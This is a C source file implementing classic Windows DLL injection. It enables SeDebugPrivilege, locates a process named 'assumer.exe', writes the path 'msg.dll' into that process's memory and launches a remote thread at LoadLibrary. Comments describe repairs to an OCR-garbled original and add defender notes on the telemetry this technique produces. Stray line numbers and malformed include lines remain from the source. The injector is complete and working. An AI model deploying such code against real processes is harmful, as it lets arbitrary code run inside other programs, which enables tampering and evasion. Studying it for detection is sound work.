1. # include <Windows. h>
2. # include <tchar. h>
3. # include <TlHelp32.h>
4.
/* Load the DLL at lpszLibName into process dwProcessId through a remote
 * thread at LoadLibrary. Returns TRUE on success, FALSE on any failure. */
BOOL LoadRemoteDll(DWORD dwProcessId, LPTSTR lpszLibName);

/* Enable the privilege called `name` in the current process token.
 * Returns 0 on success, otherwise a Win32 error code. */
DWORD EnablePrivilege(PCSTR name);

/* Find the ID of the first running process whose image name matches
 * szProcessName. Returns TRUE and stores the ID in *lpPID on success. */
BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID);
8.
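/*
 * Enable one named privilege (WinMain passes SE_DEBUG_NAME) in the access
 * token of the current process.
 *
 * name    privilege name as a narrow string.
 * Returns 0 when the privilege was enabled, otherwise a Win32 error code.
 *
 * AdjustTokenPrivileges returns TRUE even when the privilege is not present
 * in the token and reports that case only through GetLastError
 * (ERROR_NOT_ALL_ASSIGNED), which is why the result is taken from
 * GetLastError rather than from the BOOL return value.
 *
 * Defender note: a non-debugger process enabling SeDebugPrivilege is a
 * well-known audit signal (token privilege adjustment is auditable).
 *
 * Fixes relative to the original: LookupPrivilegeValue and OpenProcessToken
 * results are now checked; before, a failed OpenProcessToken left hToken
 * uninitialised and the garbage handle was passed to AdjustTokenPrivileges
 * and CloseHandle.
 */
DWORD EnablePrivilege(PCSTR name)
{
    HANDLE hToken = NULL;
    DWORD rv;
    TOKEN_PRIVILEGES priv;

    ZeroMemory(&priv, sizeof priv);
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    /* name is PCSTR, so call the A variant explicitly; the TCHAR-generic
     * LookupPrivilegeValue would mismatch under a UNICODE build. */
    if (!LookupPrivilegeValueA(NULL, name, &priv.Privileges[0].Luid)) {
        return GetLastError();
    }

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        return GetLastError();
    }

    AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof priv, NULL, NULL);
    rv = GetLastError();   /* 0 on success, ERROR_NOT_ALL_ASSIGNED if the token lacks it */

    CloseHandle(hToken);
    return rv;
}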
36.
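/*
 * Look up the process ID of the first running process whose image file name
 * matches szProcessName (case-insensitive), using a Toolhelp snapshot.
 *
 * szProcessName  image file name to match (WinMain passes "assumer.exe").
 * lpPID          receives the matching process ID on success.
 * Returns TRUE and sets *lpPID when a match is found, FALSE otherwise
 * (including NULL arguments and snapshot failure).
 *
 * Assumes a non-UNICODE build, as the original did: szProcessName is LPSTR
 * while PROCESSENTRY32 and lstrcmpi follow the TCHAR setting.
 *
 * Fixes relative to the original: the snapshot call name and the two
 * comparisons were garbled (assignment instead of ==); the snapshot handle
 * leaked when Process32First failed; the szProcessName parameter was ignored
 * in favour of a hard-coded name; the unused STARTUPINFO and
 * PROCESS_INFORMATION locals are gone.
 */
BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID)
{
    PROCESSENTRY32 ps;
    HANDLE hSnapshot;
    BOOL found = FALSE;

    if (szProcessName == NULL || lpPID == NULL) {
        return FALSE;
    }

    ZeroMemory(&ps, sizeof ps);
    ps.dwSize = sizeof ps;   /* Process32First/Next reject the entry without this */

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    if (Process32First(hSnapshot, &ps)) {
        do {
            if (lstrcmpi(ps.szExeFile, szProcessName) == 0) {
                *lpPID = ps.th32ProcessID;
                found = TRUE;
                break;
            }
        } while (Process32Next(hSnapshot, &ps));
    }

    /* Single exit so the snapshot handle is released on every path. */
    CloseHandle(hSnapshot);
    return found;
}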
75.
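/*
 * Load the DLL named by lpszLibName into the process dwProcessId by writing
 * the path into the target's address space and starting a remote thread at
 * LoadLibrary (the classic CreateRemoteThread injection).
 *
 * dwProcessId  target process ID.
 * lpszLibName  path of the DLL to load, in TCHARs.
 * Returns TRUE only when the remote thread finished and LoadLibrary returned
 * a non-NULL module handle; FALSE on any failure. The remote buffer and both
 * handles are released in the __finally block on every path.
 *
 * Defender note: OpenProcess(PROCESS_ALL_ACCESS) on a foreign process,
 * followed by VirtualAllocEx, WriteProcessMemory and CreateRemoteThread with
 * LoadLibrary as the start address, is the canonical telemetry pattern for
 * this technique; remote-thread-creation and image-load notifications see it
 * regardless of what the DLL does.
 *
 * Fixes relative to the original: the OCR-garbled __try/__leave/__finally
 * keywords and comparison operators are restored; the buffer is sized in
 * bytes (cch * sizeof(TCHAR)) and the LoadLibrary variant follows the TCHAR
 * width instead of always passing a character count to LoadLibraryA; the
 * TEXT() wrapper and stray space in the GetProcAddress name (an LPCSTR
 * parameter) are removed; the remote thread's exit code, which carries
 * LoadLibrary's return value, is now checked instead of reporting success
 * as soon as the thread exits.
 */
BOOL LoadRemoteDll(DWORD dwProcessId, LPTSTR lpszLibName)
{
    BOOL bResult = FALSE;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    PVOID pszLibFileRemote = NULL;
    SIZE_T cbLibName;
    DWORD dwExitCode = 0;
    PTHREAD_START_ROUTINE pfnThreadRtn;

    if (lpszLibName == NULL) {
        return FALSE;
    }

    __try {
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
        if (hProcess == NULL) {
            __leave;
        }

        /* Bytes, not characters: the path is copied verbatim as TCHARs. */
        cbLibName = ((SIZE_T)lstrlen(lpszLibName) + 1) * sizeof(TCHAR);

        pszLibFileRemote = VirtualAllocEx(hProcess, NULL, cbLibName, MEM_COMMIT, PAGE_READWRITE);
        if (pszLibFileRemote == NULL) {
            __leave;
        }
        if (!WriteProcessMemory(hProcess, pszLibFileRemote, lpszLibName, cbLibName, NULL)) {
            __leave;
        }

        /* The local address of LoadLibrary is used as the remote start
         * address; this relies on kernel32 being mapped at the same base in
         * the target process. GetProcAddress takes an ANSI name. */
#ifdef UNICODE
        pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
#else
        pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
#endif
        if (pfnThreadRtn == NULL) {
            __leave;
        }

        hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL);
        if (hThread == NULL) {
            __leave;
        }

        if (WaitForSingleObject(hThread, INFINITE) != WAIT_OBJECT_0) {
            __leave;
        }
        /* The thread's exit code is LoadLibrary's HMODULE; 0 means the load failed. */
        if (!GetExitCodeThread(hThread, &dwExitCode) || dwExitCode == 0) {
            __leave;
        }
        bResult = TRUE;
    }
    __finally {
        if (pszLibFileRemote != NULL) {
            VirtualFreeEx(hProcess, pszLibFileRemote, 0, MEM_RELEASE);
        }
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
        if (hProcess != NULL) {
            CloseHandle(hProcess);
        }
    }
    return bResult;
}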
120.
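/*
 * Program entry: enable SeDebugPrivilege, find the target process by image
 * name, then load the DLL into it.
 *
 * Returns 0 on success and 1 when any of the three steps fails.
 *
 * Fixes relative to the original: the stray ';' after the EnablePrivilege
 * test turned the following `return 0;` into an unconditional statement, so
 * the function always exited before doing anything; `0! =` and the
 * OCR-split DLL name are restored; WINAPI is added because the CRT invokes
 * WinMain with the __stdcall convention; the function now returns a value
 * on every path instead of falling off the end.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    DWORD dwPID = 0;

    UNREFERENCED_PARAMETER(hInstance);
    UNREFERENCED_PARAMETER(hPrevInstance);
    UNREFERENCED_PARAMETER(lpCmdLine);
    UNREFERENCED_PARAMETER(nCmdShow);

    /* Without SeDebugPrivilege, OpenProcess in LoadRemoteDll fails for
     * processes this user is not otherwise allowed to open. */
    if (EnablePrivilege(SE_DEBUG_NAME) != 0) {
        return 1;
    }
    if (!GetProcessIdByName("assumer.exe", &dwPID)) {
        return 1;
    }
    if (!LoadRemoteDll(dwPID, TEXT("msg.dll"))) {
        return 1;
    }
    return 0;
}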